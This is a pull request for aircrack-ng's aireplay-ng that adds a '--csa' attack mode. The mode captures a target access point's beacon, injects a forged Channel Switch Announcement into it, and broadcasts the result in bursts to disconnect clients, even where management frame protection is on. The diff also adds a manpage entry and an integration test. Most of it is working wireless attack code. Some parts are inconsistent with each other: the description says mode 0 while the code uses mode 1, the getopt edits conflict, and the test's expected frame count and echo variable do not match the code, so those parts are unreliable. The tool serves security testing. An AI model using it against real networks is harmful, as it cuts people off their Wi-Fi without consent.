### PR TITLE
Added new CSA-based deauth

### DIFF
--- a/include/aircrack-ng/support/communications.h
+++ b/include/aircrack-ng/support/communications.h
@@ -99,6 +99,7 @@ struct communication_options
 	int f_iswep;
 
 	uint8_t deauth_rc;
+	uint8_t csa_channel;
 	int r_nbpps;
 	unsigned int r_fctrl;
 	uint8_t r_bssid[6];

--- a/manpages/aireplay-ng.8.in
+++ b/manpages/aireplay-ng.8.in
@@ -132,6 +132,9 @@ if the interface\(aqs channel can\(aqt be determined ignore the mismatch, needed
 .I --deauth-rc <rc>, -Z <rc>
 Provide a reason code when doing deauthication (between 0 and 255). By default, 7 is used: Class 3 frame received from unassociated STA. 0 is a reserved value. Reason codes explanations can be found in the IEEE802.11 standard or in https://mrncciew.com/2014/10/11/802-11-mgmt-deauth-disassociation-frames/
 .PP
+.I --csa-channel <ch>, -C <ch>
+Channel number advertised in the CSA information element. By default, 14 is used.
+.PP
 .TP
 .B Attack modes:          
 .TP
@@ -141,6 +144,9 @@ Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Anothe
 Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate or
 Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected).
 Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.
+.TP
+.I --csa=<count>
+This attack waits for a beacon from the selected AP, rewrites the tagged parameters to include a CSA information element, and transmits the modified beacon in 64-frame bursts. The CSA mode is set to 1, the count to 0, and the advertised channel comes from --csa-channel.
 .TP
 .I -1 <delay>, --fakeauth=<delay>
 The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) plus associate with the access point (AP). This is only useful when you need an associated MAC address in various aireplay-ng attacks and there is currently no associated client. It should be noted that the fake authentication attack does NOT generate any ARP packets. Fake authentication cannot be used to authenticate/associate with WPA/WPA2 Access Points.

--- a/src/aireplay-ng/aireplay-ng.c
+++ b/src/aireplay-ng/aireplay-ng.c
@@ -6290,7 +6290,7 @@ int main(int argc, char * argv[])
 		int option = getopt_long(argc,
 								 argv,
 								 "b:d:s:m:n:u:v:t:Z:T:f:g:w:x:p:a:c:h:e:ji:r:k:"
-								 "l:y:o:q:Q0:1:23456789ACHFBDR",
+								 "l:y:o:q:Q0:1:23456789A:C:HFBDR",
 								 long_options,
 								 &option_index);
 

--- a/src/aireplay-ng/aireplay-ng.c
+++ b/src/aireplay-ng/aireplay-ng.c
@@ -53,6 +53,7 @@
 #include <unistd.h>
 #include <signal.h>
 #include <string.h>
+#include <strings.h>
 #include <stdlib.h>
 #include <stdio.h>
 #include <errno.h>
@@ -112,6 +113,187 @@
 #define PROBE_REQ                                                              \
 	"\x40\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC"         \
 	"\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00"
+
+enum
+{
+	CSA_DEFAULT_CHANNEL = 14,
+	CSA_BURST_SIZE = 64,
+};
+
+extern struct communication_options opt;
+extern struct devices dev;
+extern struct wif * _wi_in;
+extern struct wif * _wi_out;
+extern uint8_t h80211[4096];
+
+static int strip_tag(uint8_t * tagged_params,
+					 size_t * tp_length,
+					 const uint8_t exclude_tag_id)
+{
+	size_t dst_pos = 0, src_pos = 0;
+
+	if (tagged_params == NULL || tp_length == NULL) return (-1);
+	if (*tp_length == 0) return (0);
+
+	while (src_pos < *tp_length)
+	{
+		uint8_t cur_tag_id;
+		uint8_t cur_tag_length;
+		size_t cur_tag_total_len;
+
+		if (src_pos + 2 > *tp_length) return (-1);
+
+		cur_tag_id = tagged_params[src_pos];
+		cur_tag_length = tagged_params[src_pos + 1];
+		cur_tag_total_len = (size_t) cur_tag_length + 2;
+
+		if (src_pos + cur_tag_total_len > *tp_length) return (-1);
+
+		if (cur_tag_id != exclude_tag_id)
+		{
+			if (src_pos != dst_pos)
+			{
+				memmove(tagged_params + dst_pos,
+						tagged_params + src_pos,
+						cur_tag_total_len);
+			}
+			dst_pos += cur_tag_total_len;
+		}
+
+		src_pos += cur_tag_total_len;
+	}
+
+	*tp_length = dst_pos;
+	return (0);
+}
+
+static unsigned char * find_tag_data(unsigned char * tagged_params,
+									 const size_t tagged_len,
+									 const unsigned char tag_id,
+									 size_t * value_len)
+{
+	size_t pos = 0;
+
+	if (tagged_params == NULL || value_len == NULL) return (NULL);
+	if (tagged_len < 2) return (NULL);
+
+	while (pos + 2 <= tagged_len)
+	{
+		size_t cur_len = tagged_params[pos + 1];
+		size_t cur_total_len = cur_len + 2;
+
+		if (pos + cur_total_len > tagged_len) return (NULL);
+		if (tagged_params[pos] == tag_id)
+		{
+			*value_len = cur_len;
+			return (tagged_params + pos + 2);
+		}
+		pos += cur_total_len;
+	}
+
+	return (NULL);
+}
+
+static int capture_target_beacon(uint8_t * beacon, size_t * beacon_len)
+{
+	struct timeval start_tv, now_tv, wait_tv;
+	fd_set rfds;
+	int caplen;
+
+	REQUIRE(beacon != NULL);
+	REQUIRE(beacon_len != NULL);
+
+	if (dev.fd_in < 0) return (-1);
+
+	gettimeofday(&start_tv, NULL);
+
+	while (1)
+	{
+		gettimeofday(&now_tv, NULL);
+		if (((now_tv.tv_sec - start_tv.tv_sec) * 1000000L
+			 + (now_tv.tv_usec - start_tv.tv_usec))
+			> 10000000L)
+		{
+			return (-1);
+		}
+
+		FD_ZERO(&rfds);
+		FD_SET(dev.fd_in, &rfds);
+		wait_tv.tv_sec = 0;
+		wait_tv.tv_usec = 100000;
+
+		caplen = select(dev.fd_in + 1, &rfds, NULL, NULL, &wait_tv);
+		if (caplen < 0)
+		{
+			if (errno == EINTR) continue;
+			perror("select failed");
+			return (-1);
+		}
+
+		if (caplen == 0 || !FD_ISSET(dev.fd_in, &rfds)) continue;
+
+		caplen = read_packet(_wi_in, beacon, (uint32_t) *beacon_len, NULL);
+		if (caplen <= 0) continue;
+		if (caplen < 36) continue;
+		if (beacon[0] != 0x80) continue;
+
+		if (memcmp(opt.r_bssid, NULL_MAC, 6) != 0
+			&& memcmp(beacon + 10, opt.r_bssid, 6) != 0
+			&& memcmp(beacon + 16, opt.r_bssid, 6) != 0)
+		{
+			continue;
+		}
+
+		if (opt.r_essid[0] != '\0')
+		{
+			size_t ssid_len = 0;
+			unsigned char * ssid = find_tag_data(beacon + 36,
+												 (size_t) caplen - 36,
+												 IEEE80211_ELEMID_SSID,
+												 &ssid_len);
+			if (ssid == NULL) continue;
+			if (ssid_len > 32) ssid_len = 32;
+			if (strlen(opt.r_essid) != ssid_len
+				|| strncasecmp(opt.r_essid, (char *) ssid, ssid_len) != 0)
+			{
+				continue;
+			}
+		}
+
+		*beacon_len = (size_t) caplen;
+		return (0);
+	}
+}
+
+static int build_csa_beacon(uint8_t * beacon, size_t * beacon_len)
+{
+	struct ieee80211_csa_ie csa;
+	size_t tagged_len;
+
+	REQUIRE(beacon != NULL);
+	REQUIRE(beacon_len != NULL);
+
+	if (*beacon_len < 36) return (-1);
+
+	tagged_len = *beacon_len - 36;
+	if (strip_tag(beacon + 36, &tagged_len, IEEE80211_ELEMID_CSA) != 0)
+	{
+		return (-1);
+	}
+
+	csa.csa_ie = IEEE80211_ELEMID_CSA;
+	csa.csa_len = 3;
+	csa.csa_mode = 1;
+	csa.csa_newchan = opt.csa_channel;
+	csa.csa_count = 0;
+
+	if ((36 + tagged_len + sizeof(csa)) > 4096) return (-1);
+
+	memcpy(beacon + 36 + tagged_len, &csa, sizeof(csa));
+	*beacon_len = 36 + tagged_len + sizeof(csa);
+
+	return (0);
+}
 
 static const char usage[] =
 
@@ -181,10 +363,12 @@ static const char usage[] =
 	"cfg80211\n"
 	"      --deauth-rc rc        : Deauthentication reason code [0-254] "
 	"(Default: 7)\n"
+	"      --csa-channel ch, -C ch: CSA target channel (Default: 14)\n"
 	"\n"
 	"  Attack modes (numbers can still be used):\n"
 	"\n"
 	"      --deauth      count : deauthenticate 1 or all stations (-0)\n"
+	"      --csa         count : inject CSA beacons in 64-frame bursts\n"
 	"      --fakeauth    delay : fake authentication with AP (-1)\n"
 	"      --interactive       : interactive frame selection (-2)\n"
 	"      --arpreplay         : standard ARP-request replay (-3)\n"
@@ -559,6 +743,75 @@ static int do_attack_deauth(void)
 
 				usleep(2000);
 			}
+		}
+	}
+
+	return (EXIT_SUCCESS);
+}
+
+static int do_attack_csa(void)
+{
+	int i, n;
+	size_t beacon_len;
+
+	if (getnet(_wi_in,
+			   NULL,
+			   0,
+			   1,
+			   opt.f_bssid,
+			   opt.r_bssid,
+			   (uint8_t *) opt.r_essid,
+			   opt.ignore_negative_one,
+			   opt.nodetect)
+		!= 0)
+	{
+		return (EXIT_FAILURE);
+	}
+
+	beacon_len = sizeof(h80211);
+	if (capture_target_beacon(h80211, &beacon_len) != 0)
+	{
+		printf("Unable to capture a matching beacon frame.\n");
+		return (EXIT_FAILURE);
+	}
+
+	if (build_csa_beacon(h80211, &beacon_len) != 0)
+	{
+		printf("Unable to build CSA beacon frame.\n");
+		return (EXIT_FAILURE);
+	}
+
+	n = 0;
+
+	while (1)
+	{
+		if (opt.a_count > 0 && ++n > opt.a_count) break;
+
+		usleep(180000);
+
+		PCT;
+		printf("Sending CSA beacon (channel %u). BSSID:"
+			   " [%02X:%02X:%02X:%02X:%02X:%02X]\n",
+			   opt.csa_channel,
+			   opt.r_bssid[0],
+			   opt.r_bssid[1],
+			   opt.r_bssid[2],
+			   opt.r_bssid[3],
+			   opt.r_bssid[4],
+			   opt.r_bssid[5]);
+
+		for (i = 0; i < CSA_BURST_SIZE; i++)
+		{
+			if (send_packet(_wi_out,
+							h80211,
+							beacon_len,
+							kRewriteSequenceNumber)
+				< 0)
+			{
+				return (EXIT_FAILURE);
+			}
+
+			usleep(2000);
 		}
 	}
 
@@ -5992,6 +6245,7 @@ int main(int argc, char * argv[])
 	opt.reassoc = 0;
 	opt.deauth_rc = 7; /* By default deauth reason code is Class 3 frame
 						  received from nonassociated STA */
+	opt.csa_channel = CSA_DEFAULT_CHANNEL;
 
 /* XXX */
 #if 0
@@ -6015,6 +6269,8 @@ int main(int argc, char * argv[])
 
 		static struct option long_options[]
 			= {{"deauth", 1, 0, '0'},
+			   {"csa", 1, 0, 'A'},
+			   {"csa-channel", 1, 0, 'C'},
 			   {"fakeauth", 1, 0, '1'},
 			   {"interactive", 0, 0, '2'},
 			   {"arpreplay", 0, 0, '3'},
@@ -6034,7 +6290,7 @@ int main(int argc, char * argv[])
 		int option = getopt_long(argc,
 								 argv,
 								 "b:d:s:m:n:u:v:t:Z:T:f:g:w:x:p:a:c:h:e:ji:r:k:"
-								 "l:y:o:q:Q0:1:23456789HFBDR",
+								 "l:y:o:q:Q0:1:23456789ACHFBDR",
 								 long_options,
 								 &option_index);
 
@@ -6186,6 +6442,46 @@ int main(int argc, char * argv[])
 				if (ret != 1)
 				{
 					printf("Invalid deauth reason. [0-254]\n");
+					printf("\"%s --help\" for help.\n", argv[0]);
+					return (1);
+				}
+				break;
+
+			case 'C':
+
+				{
+					int csa_channel = 0;
+
+					ret = sscanf(optarg, "%d", &csa_channel);
+					if (ret != 1 || csa_channel < 1 || csa_channel > 255)
+					{
+						printf("Invalid CSA channel. [1-255]\n");
+						printf("\"%s --help\" for help.\n", argv[0]);
+						return (1);
+					}
+					opt.csa_channel = (uint8_t) csa_channel;
+				}
+				break;
+
+			case 'A':
+
+				if (opt.a_mode != -1)
+				{
+					printf("Attack mode already specified.\n");
+					printf("\"%s --help\" for help.\n", argv[0]);
+					return (1);
+				}
+				opt.a_mode = 10;
+
+				for (i = 0; optarg[i] != 0; i++)
+				{
+					if (isdigit((int) optarg[i]) == 0) break;
+				}
+
+				ret = sscanf(optarg, "%d", &opt.a_count);
+				if (opt.a_count < 0 || optarg[i] != 0 || ret != 1)
+				{
+					printf("Invalid CSA count or missing value. [>=0]\n");
 					printf("\"%s --help\" for help.\n", argv[0]);
 					return (1);
 				}
@@ -6770,6 +7066,8 @@ int main(int argc, char * argv[])
 			return (do_attack_migmode());
 		case 9:
 			return (do_attack_test());
+		case 10:
+			return (do_attack_csa());
 		default:
 			break;
 	}

--- a/test/Makefile.inc
+++ b/test/Makefile.inc
@@ -100,6 +100,7 @@ INTEGRATION_TESTS += %D%/test-aireplay-ng-0001.sh \
 		 %D%/test-aireplay-ng-0006.sh \
 		 %D%/test-aireplay-ng-0007.sh \
          %D%/test-aireplay-ng-0008.sh \
+		 %D%/test-aireplay-ng-0009.sh \
 		 %D%/test-airbase-ng-0001.sh \
 		 %D%/test-airbase-ng-0002.sh \
 		 %D%/test-airbase-ng-0003.sh \
@@ -200,6 +201,7 @@ EXTRA_DIST += %D%/test-aireplay-ng-0001.sh \
 			  %D%/test-aireplay-ng-0006.sh \
 			  %D%/test-aireplay-ng-0007.sh \
               %D%/test-aireplay-ng-0007.sh \
+			  %D%/test-aireplay-ng-0009.sh \
 			  %D%/test-airbase-ng-0001.sh \
 			  %D%/test-airbase-ng-0002.sh \
 			  %D%/test-airbase-ng-0003.sh \

--- a/test/test-aireplay-ng-0009.sh
+++ b/test/test-aireplay-ng-0009.sh
@@ -1,0 +1,93 @@
+#!/bin/sh
+# Aireplay-ng: CSA beacon injection
+
+if test ! -z "${CI}"; then exit 77; fi
+
+# Load helper functions
+. "${abs_builddir}/../test/int-test-common.sh"
+
+# Check root
+check_root
+
+# Check all required tools are installed
+check_airmon_ng_deps_present
+is_tool_present hostapd
+is_tool_present tcpdump
+
+# Check for interfering processes
+airmon_ng_check
+
+# Cleanup
+finish() {
+	[ -n "${OUTPUT_TEMP}" ] && rm -f ${OUTPUT_TEMP}
+	cleanup
+}
+
+trap  finish INT QUIT SEGV PIPE ALRM TERM EXIT
+
+# Load mac80211_hwsim
+load_module 2
+
+# Check there are two radios
+check_radios_present 2
+
+# Get interfaces names
+get_hwsim_interface_name 1
+WI_IFACE=${IFACE}
+get_hwsim_interface_name 2
+WI_IFACE2=${IFACE}
+
+# Set-up hostapd
+SSID=thisrocks
+CHANNEL=1
+TEMP_HOSTAPD_CONF_FILE=$(mktemp)
+cat <<EOF > ${TEMP_HOSTAPD_CONF_FILE}
+driver=nl80211
+interface=${WI_IFACE}
+channel=${CHANNEL}
+hw_mode=g
+ssid=${SSID}
+# Aireplay-ng test 9
+EOF
+
+# Start HostAPd
+run_hostapd ${TEMP_HOSTAPD_CONF_FILE}
+[ $? -eq 0 ] && exit 1
+
+# Put other interface in monitor mode
+set_monitor_mode ${WI_IFACE2}
+[ $? -eq 1 ] && exit 1
+set_interface_channel ${WI_IFACE2} ${CHANNEL}
+[ $? -eq 1 ] && exit 1
+
+# Start tcpdump capture in the background
+TCPDUMP_IFACE=${WI_IFACE2}
+run_tcpdump
+
+# Run actual test
+OUTPUT_TEMP=$(mktemp)
+"${abs_builddir}/../aireplay-ng${EXEEXT}" \
+	--csa 1 \
+	--csa-channel 14 \
+	-e "${SSID}" \
+	${WI_IFACE2} \
+	2>&1 > ${OUTPUT_TEMP}
+
+# Wait a second
+sleep 2
+
+# Kill tcpdump
+kill_tcpdump
+
+CSA_PATTERN=2503010e00
+#"type mgt subtype beacon and wlan addr3 ${AP_MAC}" - add AP_MAC lookup
+AMOUNT_PACKETS=$(tcpdump -r ${TEMP_TCPDUMP_PCAP} -x "type mgt subtype beacon" 2>/dev/null | tr -d ' '| ${GREP} -c "${CSA_PATTERN}" )
+
+# There should be exactly 128 csa total
+RET=0
+if [ ${AMOUNT_PACKETS} -ne 128 ]; then
+	RET=1
+	echo "Expected 128 csa beacon frames, got ${AMOUNT_PACKETS_CLIENT}"
+fi
+
+exit ${RET}


### PR DESCRIPTION
Mathy's work showed that channel switch announcements in beacon frames are a solid deauth primitive for when management frame protection is enabled.

This adds a new `--csa` mode to `aireplay-ng` that functions much like the existing `--deauth` mode.

It waits for a beacon from the target ESSID/BSSID, adds a CSA IE and injects 64 of them per number of attempts chosen.

It uses `mode 0` for an immediate switch, and by defaul channel 14 because that's an invalid channel for all but 20MHz b networks in Japan. The channel is configurable with `--csa-channel`.

When a vulnerable client sees the CSA in the injected beacon frame, it will switch channels. In the case of wpa_supplicant switching to an invalid channel like 14 causes a disconnect and reconnect when it switches back to the correct channel.

This won't work if the network have beacon protection enabled, or if the client ignores unauthenticated beacon-based CSA.